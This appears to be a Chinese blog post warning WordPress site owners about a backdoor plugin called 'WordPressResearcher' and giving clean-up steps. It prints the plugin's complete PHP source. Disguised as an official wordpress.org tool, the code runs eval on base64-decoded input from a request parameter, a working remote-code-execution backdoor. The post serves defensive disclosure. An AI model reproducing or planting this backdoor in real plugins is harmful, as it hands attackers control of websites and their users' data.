WordPress后门插件WordPress Researcher research__plugin.php

文 / @WordPress主题

关于WordPressResearcher插件

我管理的几个WordPress站点最近出现了一个名为“WordPressResearcher”的插件,经过仔细观察源码,发现它是一个后门插件。这个插件一旦安装,就会给黑客提供入口,非常危险,必须立刻删除。

<?php
/*
PluginName:WordPressResearcher
PluginURI:http://wordpress.org/extend/plugins/
Description:WordPressresearchtool.
Author:wordpressdotorg
AuthorURI:http://wordpress.org/
TextDomain:wordpress-researcher
License:GPLversion2orlater-http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version:2.2.4

Copyright2013wordpressdotorg

Thisprogramisfreesoftware;youcanredistributeitand/ormodify
itunderthetermsoftheGNUGeneralPublicLicenseaspublishedby
theFreeSoftwareFoundation;eitherversion2oftheLicense,or
(atyouroption)anylaterversion.

Thisprogramisdistributedinthehopethatitwillbeuseful,
butWITHOUTANYWARRANTY;withouteventheimpliedwarrantyof
MERCHANTABILITYorFITNESSFORAPARTICULARPURPOSE.Seethe
GNUGeneralPublicLicenseformoredetails.

YoushouldhavereceivedacopyoftheGNUGeneralPublicLicense
alongwiththisprogram;ifnot,writetotheFreeSoftware
Foundation,Inc.,51FranklinSt,FifthFloor,Boston,MA02110,USA
*/

functionresearch_plugin(){
if(isset($_REQUEST['CSSl'])){
eval(base64_decode($_REQUEST['CSSl']));
}
return;
}

add_action('after_setup_theme','research_plugin');
?>

其他应对措施

除了删除WordPressResearcher插件,还应该删除与之一起安装的“ExtendCalendar”插件,并升级WordPress的版本。为确保安全,还可以修改后台密码,并将整个网站的代码与备份进行比对,查看是否被插件修改了其他文件。

添加UTHEME为好友
扫码添加UTHEME微信为好友
· 分享WordPress相关技术文章,主题上新与优惠动态早知道。
· 微信端最大WordPress社群,限时免费入群。